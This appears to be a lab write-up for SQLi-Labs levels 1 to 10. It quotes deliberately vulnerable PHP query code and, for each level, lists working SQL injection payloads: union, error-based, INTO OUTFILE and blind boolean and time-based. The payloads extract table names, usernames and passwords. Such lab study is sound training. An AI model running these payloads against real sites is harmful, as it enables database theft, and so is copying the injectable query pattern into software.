SQLi-Labs Less 1-10

SQLi-Labs Less 1-10

Less-1 GET - Error based - Single Quotes - String 报错注入

Code:

if(isset($_GET['id']))
{
     $id=$_GET['id'];
     $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
     if($row)
        {
        echo 'Your Login name:'. $row['username'];
        echo 'Your Password:' .$row['password'];
        }
        else
        {
        print_r(mysql_error());

Code:

' or 1=1 --+
' and 1=2 union select 1,user(),database() --+
' and 1=2 union select 1,2,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 LIMIT 3,1 --+
' and 1=2 union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 1,1 --+
' and 1=2 union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 2,1 --+
' and 1=2 union select 1,username,password from security.users LIMIT 0,1 --+

Less-2 GET - Error based - Intiger based

Code:

if(isset($_GET['id']))
{
     $id=$_GET['id'];
     $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
     if($row)
        {
        echo 'Your Login name:'. $row['username'];
        echo 'Your Password:' .$row['password'];
        }
        else
        {
        print_r(mysql_error());

Code:

1 or 1=1 --+
1 and 1=2 union select 1,user(),database() --+
1 and 1=2 union select 1,2,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 LIMIT 3,1 --+
1 and 1=2 union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 1,1 --+
1 and 1=2 union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 2,1 --+
1 and 1=2 union select 1,username,password from security.users LIMIT 0,1 --+

Less-3 GET - Error based - Single Quotes with twist - String

Code:

if(isset($_GET['id']))
{
     $id=$_GET['id'];
     $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
     if($row)
        {
        echo 'Your Login name:'. $row['username'];
        echo 'Your Password:' .$row['password'];
        }
        else
        {
        print_r(mysql_error());

Code:

') or 1=1 --+
')  and 1=2 union select 1,user(),database() --+
')  and 1=2 union select 1,2,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 LIMIT 3,1 --+
')  and 1=2 union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 1,1 --+
')  and 1=2 union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 2,1 --+
')  and 1=2 union select 1,username,password from security.users LIMIT 0,1 --+

Less-4 GET - Error based - Double Quotes - String

Code:

if(isset($_GET['id']))
{
     $id=$_GET['id'];
     $id = '"' . $id . '"';
     $sql=" SELECT * FROM users WHERE id=($id) LIMIT 0,1";
     if($row)
        {
        echo 'Your Login name:'. $row['username'];
        echo 'Your Password:' .$row['password'];
        }
        else
        {
        print_r(mysql_error());

Code:

") or 1=1 --+
")  and 1=2 union select 1,user(),database() --+
")  and 1=2 union select 1,2,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 LIMIT 3,1 --+
")  and 1=2 union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 1,1 --+
")  and 1=2 union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 2,1 --+
")  and 1=2 union select 1,username,password from security.users LIMIT 0,1 --+

Less-5 GET - Double injection - Single Quotes - String 利用报错回显
双注入语句:union select 1 from (select+count(*),concat(floor(rand(0)*2),(注入语句))a from information_schema.tables group by a)b

Code:

if(isset($_GET['id']))
{
     $id=$_GET['id'];
     $sql=" SELECT * FROM users WHERE id='$id' LIMIT 0,1";
     if($row)
        {
        echo 'You are in...........';
        }
        else
        {
        print_r(mysql_error());

Code:

' or 1=1 --+
' union select 1 from (select count(*),concat(floor(rand()*2),(select concat(version(),0x22,user(),0x22,database())))a from information_schema.tables group by a)b --+
' union select 1 from (select count(*),concat(floor(rand(0)*2),(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4))a from information_schema.tables group by a)b --+
' union select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1))a from information_schema.tables group by a)b --+
' union select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1))a from information_schema.tables group by a)b --+
' union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username,0x22,password) from security.users limit 0,1))a from information_schema.tables group by a)b --+

Less-6 GET - Double injection - Double Quotes - String

Code:

if(isset($_GET['id']))
{
     $id=$_GET['id'];
     $id = '"'.$id.'"';
     $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
     if($row)
        {
        echo 'You are in...........';
        }
        else
        {
        print_r(mysql_error());

Code:

" or 1=1 --+
" union select 1 from (select count(*),concat(floor(rand()*2),(select concat(version(),0x22, user(),0x22,database())))a from information_schema.tables group by a)b --+
" union select 1 from (select count(*),concat(floor(rand(0)*2),(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4))a from information_schema.tables group by a)b --+
" union select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1))a from information_schema.tables group by a)b --+
" union select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1))a from information_schema.tables group by a)b --+
" union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username,0x22,password) from security.users limit 0,1))a from information_schema.tables group by a)b --+

Less-7 GET - Dump into outfile - String 利用文件转储 into outfile

Code:

if(isset($_GET['id']))
{
     $id=$_GET['id'];
     $sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
     if($row)
        {
        echo 'You are in.... Use outfile......';
        }
        else
        {
        echo 'You have an error in your SQL syntax';
        //print_r(mysql_error());

Code:

')) or 1=1 --+
')) and 1=2 union select 1,2,TABLE_NAME into outfile '/var/www/tables.txt' from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 --+
')) and 1=2 union select 1,2,COLUMN_NAME into outfile '/var/www/column.txt' from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 --+
')) and 1=2 union select 1,username,password into outfile+'/var/www/data.txt' from security.users --+

Less-8 GET - Blind - Boolian Based - Single Quotes

Code:

if(isset($_GET['id']))
{
     $id=$_GET['id'];
     $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
     if($row)
        {
        echo 'You are in...........';
        }
        else
        {
        //echo 'You are in...........';
        //print_r(mysql_error());
        //echo "You have an error in your SQL syntax";

Code:

1' or 1=1 --+
1' and ascii(substr(database(),1,1))=115 --+
1' and (ascii(substr((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4),1,1))) = 117 --+
1' and (ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1 ),1,1))) = 117 --+
1' and (ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1 ),1,1))) = 112 --+
1' and (ascii(substr((select username from users limit 0,1),1,1))) = 68 --+
1' and (ascii(substr((select password from users limit 0,1),1,1))) = 68 --+

Less-9 GET - Blind - Time Based - Single Quotes

Code:

if(isset($_GET['id']))
{
     $id=$_GET['id'];
     $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
     if($row)
        {
        echo 'You are in...........';
        }
        else
        {
        echo 'You are in...........';
        //print_r(mysql_error());
        //echo "You have an error in your SQL syntax";

Code:

1' and if(ascii(substr(database(),1,1))=115,sleep(5),1) --+
1' and if((ascii(substr((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4),1,1))) = 117 ,sleep(5),1) --+
1' and if((ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1 ),1,1))) = 117 ,sleep(5),1) --+
1' and if((ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1 ),1,1))) = 112 ,sleep(5),1) --+
1' and if((ascii(substr((select username from users limit 0,1),1,1))) = 68 ,sleep(5),1) --+
1' and if((ascii(substr((select password from users limit 0,1),1,1))) = 68 ,sleep(5),1) --+

Less-10 GET - Blind - Time Based - Double Quotes

Code:

if(isset($_GET['id']))
{
     $id=$_GET['id'];
     $id = '"'.$id.'"';
     $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
     if($row)
        {
        echo 'You are in...........';
        }
        else
        {
        echo 'You are in...........';
        //print_r(mysql_error());
        //echo "You have an error in your SQL syntax";

Code:

1" and if(ascii(substr(database(),1,1))=115,sleep(5),1) --+
1" and if((ascii(substr((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4),1,1))) = 117 ,sleep(5),1) --+
1" and if((ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1 ),1,1))) = 117 ,sleep(5),1) --+
1" and if((ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1 ),1,1))) = 112 ,sleep(5),1) --+
1" and if((ascii(substr((select username from users limit 0,1),1,1))) = 68 ,sleep(5),1) --+
1" and if((ascii(substr((select password from users limit 0,1),1,1))) = 68 ,sleep(5),1) --+

你可能感兴趣的:(SQL注入)